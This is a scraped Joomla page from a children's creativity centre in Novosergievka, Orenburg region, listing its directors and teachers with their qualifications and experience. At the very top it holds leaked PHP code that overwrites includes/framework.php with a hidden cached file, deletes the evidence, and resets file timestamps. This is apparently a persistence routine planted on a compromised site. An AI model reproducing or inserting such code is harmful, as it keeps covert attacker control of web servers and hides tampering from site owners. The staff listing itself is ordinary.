$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Руководство. Педагогический состав
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Февраль 2018
Пн Вт Ср Чт Пт Сб Вс
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 1 2 3 4
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

Руководство. Педагогический состав PDF Печать E-mail
Автор: Administrator   
17.09.2014 14:39

Администрация:

 

Директор ДДТ - Девятаев Алексей Иванович

 Часы приема - Понедельник, Четверг - с 11.00 до 13.00 каб. №2;

 тел. 8 (35339) 2-37-19;    факс: 8 (35339) 2-37-19;    e-mail: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript ;

 

Замдиректора по УВР - Сутулова Оксана Владимировна

каб. №3.   тел. 8 (35339) 2-48-66;

 

Методист по воспитательной работе - Решетова Татьяна Владимировна

 каб. №3.   тел. 8 (35339) 2-48-66;


Педагог-организатор - Мигачева Наталья Валентиновна

каб. №1.   тел. 8 (35339) 2-11-60;

 

Методист по туризму и краеведению – Лыкова Ляля Канафиевна

каб. №1.   тел. 8 (35339) 2-11-60;

 

Методист РДОО "Искра" - Луконина Любовь Владимировна

каб. №1.   тел. 8 (35339) 2-11-60;

 

 

Руководители филиалов образовательной организации: ОТКРЫТЬ

 


Педагогический состав

 

ФИО

Образование

Стаж пед. работы

Общий

стаж

Преподаваемые дисциплины

Наименование направления подготовки

Курсы повышения квалификации

Категория, дата последней аттестации

Социально- педагогическое направление

Плужнова Светлана Александровна

Средне.спец. педаг.,

В/Не пед

1994 г,  Бузулукское педагогическое

училище Оренбургский Аграрный Университет

21

26

Творческое объединение ШРР «Филиппок» по предмету математика и развитие речи

Учитель начальных классов

06.10.2017-

14.10.2017

Высшая

19.11.16

Новичкова Татьяна Николаевна

сред.спец.педагогич

1978 г., Бузулукское педагогическое училище

30

36

Творческое объединение ШРР «Филиппок» по предмету ИЗО, природоведение

Учитель начальных классов

7.10.2016

Первая

28.03.13

Винокурова Елена Николаевна

В/П

2009г., «Оренбургский государственный педагогический университет»

9

18

Творческое объединение НТМ «Умелые ручки», Творческое объединение «Филиппок», физическая культура

Учитель начальных классов

7.10.2016

Первая

30.04.14

Жабина Елена Геннадьевна

В/П

2003г.,

Оренбургский государственный университет

18

18

Педагог-психолог

Учитель технологии и предпринимательства, школьный психолог

2016г

Первая

19.11.16

Девятаева Ольга Анатольевна

Сред.спец. педагогич,

В/Не педагогич

2001г. Оренбургский  педагогический

колледж №1,

в 2012 году

Оренбургский государственный университет

22

21

Творческое объединение телестудия

«Мы вместе»

Учитель начальных классов

Журналист

03.11.2016

Высшая

30.05.12

 Художественное направление

Соловых Ирина Владиленовна

В/П

1990 г. Туркменский государственный педагогический институт искусств

30

32

Творческое объединение «Гимназия» вокал

Дирижёр хора, преподаватель хоровых искусств

10.09.2012-

29.09.2012

2.02.2015-

21.02.2015

Высшая

30.05.12

Алимова Танзия

Сайдрахмановна

сред. спец.

Не педагогическое

18

27

Творческое объединение «Арабеск»

хореография

хореография

10.09.2012-

29.09.2012

2.02.2015-

21.02.2015

Первая

27.05.2015

Давыдова Елена Михайловна

сред. спец. педагогич

17

17

Творческое объединение «Бисероплетение»

Учитель технологии

2016

Первая

Мигачева Наталья Валентиновна

В/П

1994 г

Орскийгосударственный  педагогический институт им. Т.Г. Шевченко

20

22

 

Творческое объединение

«Керамика»

Учитель начальных классов

24.02.2014-

15.03.2014

Первая

06.15

Балашова В.В

Среднее

2

2

 

Творческое объединение

«В движении»
 Хореограф  Обучается на 3 курсе краснодарского хореографического университета

Соответсвие должности

Техническое направление

Медведев Николай Николаевич

В/Не пед

1989 год Хабаровский институт инженеров железнодорожного транспорта

11

 12

Творческое объединение «Авиомоделизм»

Инженер - строитель

03.11.2016

Высшая

25.11.14

Каминский Вячеслав Зиновьевич

Средне.спец. не педагогич

1981г. Техническое училище №34 при НПО «Средазэлектроаппарат»,

1999г ГОУ «Центр подготовки и переподготовки населения»

13

34

Творческое объединение

«Компьютерра»

Сборщик электрических машин и аппаратов.

Радиомеханик по ремонту и обслуживанию теле-радиоаппаратуры

3.04.2017

Первая

27.06.13

Туристко- краеведческое направление

Смолина Наталья

Валерьевна

В/П

10

10

Творческое объединение «Туристическое многоборье»

Психолог

2.02.2015-

21.02.2015

Первая

28.01.2015

Даутов Зайнитдин Гильмитдинович

(совместитель)

В/П

31

31

Творческое объединение «Клаксон»

«Юный инспектор дорожного движения»

 Учитель технологии  2016

Первая

Ручкин Михаил Викторович

(совместитель)

Средн.спец. не педагогич

36

36

Творческое объединение «Юный турист» Туризм

 Учитель физкультуры  2016

1 учительская

Бражкин Денис Викторович

В/П 2000, Оренбургский государственный педагогический университет

16

16

Творческое объединение «Туристические тропы»

 Учитель технологии  2017г Первая

Жангуров Мурат Серкалиевич

Средне-специальное, 2008, пед. колледж

4

4

Творческое объединение «Крепкий карабин»

 Учитель физкультуры

2.02.2015-

21.02.2015

Первая

29.06.2016

Семенов Александр Николаевич

В/П

1996г., Оренбургский государственный институт

26

27

Творческое объединение «Азимут»

 Учитель физкультуры  2015 г

Первая

Струц Алексей Николаевич

В/П 2008г., Оренбургский государственный педагогический университет

22

23

Творческое объединение «Дорога туриста»

 Учитель физкультуры  2015 г

Первая

2014

Мигачев Александр Михайлович

В/П 2005г, Оренбургский государственный педагогический университет

15

 25

Творческое объединение «Юный пограничник»

 Учитель физкультуры  2015 г

Первая


 

Кол-во аттестованных руководящих и педагогических работников

 

Имеют высшую категорию -- 6

 

Имеют первую категорию-  18

 

Не имеют категории - 4

 

Кол-во педагогов с образованием

 

Имеют высшее педагогическое – 17

 

Имеют высшее не педагогич – 3

 

Имеют средне.спец. педагогич – 3, имеют средне спец. Не педагогич – 7

 

Стаж работы:

 

До 10 лет   - 8

 

От 10 до 15 лет - 3

 

От 15 до 25 лет-  9

 

Свыше 25 лет- 10

 


comback_black_green_75

Обновлено 18.10.2017 14:30